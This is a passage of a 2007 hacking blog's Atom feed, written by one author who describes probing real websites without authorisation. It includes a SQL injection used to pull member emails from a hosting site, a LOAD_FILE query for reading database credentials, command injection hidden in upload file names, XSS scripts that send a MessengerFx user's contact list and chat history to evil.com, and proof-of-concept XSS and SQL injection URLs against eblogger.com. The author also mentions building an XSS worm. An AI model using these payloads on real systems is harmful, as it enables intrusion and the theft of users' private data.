src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-2700750999334805639</id><published>2007-07-05T11:39:00.000+01:00</published><updated>2007-07-05T17:33:32.017+01:00</updated><title type='text'>XSS's still not being taken seriously..</title><content type='html'>&lt;div class='code-div'&gt;"Enhanced XSS Protection&lt;br /&gt;&lt;br /&gt;Substantial backend changes have been made &lt;br /&gt;to further protect cPanel and WHM users from cross-site&lt;br /&gt;scripting. Many behind the scenes functions have &lt;br /&gt;been added to render such &lt;b&gt;&lt;u&gt;nuisances&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;harmless." - Cpanel's website about Cpanel 11&lt;/div&gt;&lt;br /&gt;As I was looking to see what the default cpanel database/table/column names&lt;br /&gt;were and it shows that people STILL haven't really realized&lt;br /&gt;the impact XSS's can have on a website both to the&lt;br /&gt;site and to its owner, as soon as I find a site running&lt;br /&gt;Cpanel 11 I am determined to bypass this protection..&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-2700750999334805639?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/2700750999334805639/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=2700750999334805639' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/2700750999334805639'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/2700750999334805639'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/07/xsss-still-not-being-taken-seriously.html' title='XSS&apos;s still not being taken seriously..'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-5593485457991093976</id><published>2007-07-04T03:40:00.000+01:00</published><updated>2007-07-04T03:47:06.983+01:00</updated><title type='text'>Free Hosting?</title><content type='html'>While trying to get "Free hosting"&lt;br /&gt;I came across a host with an SQL injection&lt;br /&gt;on their site, I started trying to inject it&lt;br /&gt;and it wasn't long before I found the table "members"&lt;br /&gt;from here I got the columns:&lt;br /&gt;[x]Email&lt;br /&gt;[x]Address&lt;br /&gt;[x]Phone&lt;br /&gt;&lt;br /&gt;but could not find the username or password column&lt;br /&gt;(List of what I tried is too long for here..)&lt;br /&gt;so I started trying out new ways of finding out as&lt;br /&gt;much about the table I was in as I could,&lt;br /&gt;well all I could do is try and brute force&lt;br /&gt;or guess the column names, so this didn't really&lt;br /&gt;mount to much but I ended up with the attack vector:&lt;br /&gt;&lt;div class='code-div'&gt;null UNION ALL SELECT 1,email FROM members WHERE &lt;br&gt;SUBSTRING(email,14)=CONCAT(CHAR(115), CHAR(116))/*&lt;/div&gt;&lt;br /&gt;which ment I could get emails out of the database (as the statement was&lt;br /&gt;somehow limited to 1 output (*probably in php*))&lt;br /&gt;I'll post if I get any further..&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-5593485457991093976?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/5593485457991093976/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=5593485457991093976' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/5593485457991093976'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/5593485457991093976'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/07/free-hosting.html' title='Free Hosting?'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-8457280590753652136</id><published>2007-07-01T01:11:00.000+01:00</published><updated>2007-07-01T02:53:06.584+01:00</updated><title type='text'>Nice SQL attack Vector</title><content type='html'>I saw this attack vector while on &lt;a href='http://www.0x000000.com'&gt;0x000000&lt;/a&gt;&lt;br /&gt;&lt;div class='code-div'&gt;SELECT SUBSTRING(LOAD_FILE('/var/www/html/config.php'),20,24) = 'root';&lt;/div&gt;&lt;br /&gt;Its quite interesting way of getting the&lt;br /&gt;sites db connection details, but you do need to&lt;br /&gt;know their *nix path to the config file.&lt;br /&gt;I was trying to think of ways to find this,&lt;br /&gt;but the best way to find out is to get a php error&lt;br /&gt;page as it will usually have the path,&lt;br /&gt;failing this the users name is usually the first&lt;br /&gt;8 letters of their website (if set up automatically)&lt;br /&gt;&lt;br /&gt;In IIS 6 you can read from:&lt;br /&gt;%systemroot%\system32\inetsrv\MetaBase.xml&lt;br /&gt;&lt;br /&gt;I guess you could read from the locate database in&lt;br /&gt;*nix but this can sometimes be chowned by root.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-8457280590753652136?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/8457280590753652136/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=8457280590753652136' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/8457280590753652136'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/8457280590753652136'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/07/nice-sql-attack-vector.html' title='Nice SQL attack Vector'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-6704996021551336662</id><published>2007-06-29T23:24:00.000+01:00</published><updated>2007-06-30T04:35:33.596+01:00</updated><title type='text'>Code Execution Through Filenames</title><content type='html'>I saw an article on rsnakes blog ( &lt;a href='http://ha.ckers.org'&gt;ha.ckers.org&lt;/a&gt; )&lt;br /&gt;about executing code on picture uploads through&lt;br /&gt;malformed image names.&lt;br /&gt;for instance you could call a file&lt;br /&gt;&lt;div class="code-div"&gt;|ls&lt;/div&gt;&lt;br /&gt;then it would execute the command ls&lt;br /&gt;if the script was written in perl&lt;br /&gt;but this wouldn't bypass file name&lt;br /&gt;validation,&lt;br /&gt;so I decided to mod the names and try&lt;br /&gt;it differently. I names the file&lt;br /&gt;with a .jpg file extension like this:&lt;br /&gt;&lt;div class="code-div"&gt;|ls&gt;out#.jpg&lt;/div&gt;&lt;br /&gt;this can be achieved on a *nix system with nano&lt;br /&gt;installed like this:&lt;br /&gt;&lt;div class="code-div"&gt;fazed@darkstar # nano \|ls\&gt;out#.jpg&lt;/div&gt;&lt;br /&gt;if the content of this file was also an image then&lt;br /&gt;it would bypass most php upload validation and you could then&lt;br /&gt;use a vulnerable perl file to open in and it will echo the&lt;br /&gt;output of the command to the file: out#.jpg&lt;br /&gt;I'm sure someone could find a more practical use&lt;br /&gt;for this.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-6704996021551336662?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/6704996021551336662/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=6704996021551336662' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/6704996021551336662'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/6704996021551336662'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/06/code-execution-through-filenames.html' title='Code Execution Through Filenames'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-4087175543947647115</id><published>2007-06-29T21:59:00.001+01:00</published><updated>2007-06-29T21:59:22.872+01:00</updated><title type='text'>Cross DOM Communication</title><content type='html'>In the new HTML 5 Cross DOM support is planned,&lt;br /&gt;This will allow websites with a different source domain&lt;br /&gt;from the target one to talk to each other,&lt;br /&gt;Ill let you see the huge risk for XSS attacks here.&lt;br /&gt;&lt;br /&gt;here is a link to the &lt;a href="http://www.whatwg.org/specs/web-apps/current-work/#crossDocumentMessages"&gt;Documentation&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-4087175543947647115?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/4087175543947647115/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=4087175543947647115' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4087175543947647115'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4087175543947647115'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/06/cross-dom-communication.html' title='Cross DOM Communication'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-7322351644421696466</id><published>2007-06-28T03:49:00.000+01:00</published><updated>2007-06-29T22:10:50.663+01:00</updated><title type='text'>Web2.0 Exposing your MSN?</title><content type='html'>I recently visited the site: http://MessengerFx.com&lt;br /&gt;decided I would look at their security,&lt;br /&gt;what I found is actually quite disturbing,&lt;br /&gt;I started to look around for XSS's I started&lt;br /&gt;by looking in the most obscure places but then&lt;br /&gt;I thought I should try the most obvious so&lt;br /&gt;in a conversation with someone I typed&lt;br /&gt;&lt;blockquote&gt;&lt;div class='code-div'&gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;/div&gt;&lt;/blockquote&gt;and it actually worked!&lt;br /&gt;well with it working on my side I created a new&lt;br /&gt;account and signed in on the site with it and&lt;br /&gt;went on my normal msn to talk to it.&lt;br /&gt;from here I started to look at the DOM&lt;br /&gt;as I knew that as the site was Ajax based&lt;br /&gt;to make it Asynchronous I knew that everything&lt;br /&gt;would be controlled by javascript which I could now&lt;br /&gt;call with the xss, here are a few examples&lt;br /&gt;(some need to be ASCII encoded to work)&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;blockquote&gt;&lt;div class='code-div'&gt;-- -- read there online contact list -- --&lt;br /&gt;&amp;lt;script&amp;gt;document.location.href = "http://evil.com/captcha.php?x=" + document.getElementById('divOnline').innerHTML&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;-- -- Change there display name -- --&lt;br /&gt;&amp;lt;script&amp;gt;mfx.setOwnerName('[d/n goes here]')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;-- -- Read messages from (and to) a contact -- --&lt;br /&gt;&amp;lt;script&amp;gt;document.location.href="&lt;br /&gt;http://evil.com/captcha.php?x=" + &lt;br /&gt;document.getElementById('u_[firstpartofmsn]hotmail&lt;br /&gt;_d_co_d_ukcDivHistoryBar').innerHTML&amp;lt;/script&amp;gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;br /&gt;I have many more things you can do but they are&lt;br /&gt;all going into an XSS worm I'm building.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-7322351644421696466?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/7322351644421696466/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=7322351644421696466' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7322351644421696466'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7322351644421696466'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/06/web20-exposing-your-msn.html' title='Web2.0 Exposing your MSN?'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-1150063741786601200</id><published>2007-06-28T03:23:00.000+01:00</published><updated>2007-06-28T03:32:41.131+01:00</updated><title type='text'>Eblogger Exploits</title><content type='html'>Well while trying out other blogs&lt;br /&gt;I came across eblogger.com,&lt;br /&gt;I signed up to it and started to look around&lt;br /&gt;because I like to know if what I'm&lt;br /&gt;using is secure, the first thing I saw was an XSS in&lt;br /&gt;the calender they have here is the PoC link:&lt;br /&gt;&lt;a href=http://eblogger.com/bluepysc.asp?u=fazed&amp;action=daypost&amp;amp;tday=6/27/2007%3Cscript%3Ealert('xss')%3C/script%3E&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;http://eblogger.com/bluepysc.asp?u=fazed&amp;action=daypost&amp;amp;tday=6/27/2007%3Cscript%3Ealert('xss')%3C/script%3E&lt;br /&gt;&lt;/span&gt;&lt;/a&gt;this kinda got me going and I started to look around a bit&lt;br /&gt;more, 2 minutes  later I came across an SQL injection:&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;http://www.eblogger.com/blog.asp?u='[sql]--'&amp;amp;action=photo&lt;/span&gt;&lt;br /&gt;after this I just gave up and decided to stick with blogger.com.&lt;br /&gt;&lt;br /&gt;&lt;disclaimer&gt;&lt;br /&gt;I am not responsible for the (mis) use of anything mentioned&lt;br /&gt;on this site.&lt;br /&gt;&lt;/disclaimer&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-1150063741786601200?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/1150063741786601200/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=1150063741786601200' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/1150063741786601200'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/1150063741786601200'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/06/eblogger-exploits.html' title='Eblogger Exploits'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-8117912606374039446</id><published>2007-06-28T03:20:00.000+01:00</published><updated>2007-06-28T03:21:27.926+01:00</updated><title type='text'>Welcome</title><content type='html'>&lt;span style="color:#333333;"&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Welcome wanderer,&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;you have just come across my &lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;little blog.&lt;br /&gt;Here You will find many secreats of&lt;br /&gt;the IT Security world&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-8117912606374039446?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/8117912606374039446/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=8117912606374039446' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/8117912606374039446'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/8117912606374039446'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/06/welcome.html' title='Welcome'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry></feed>
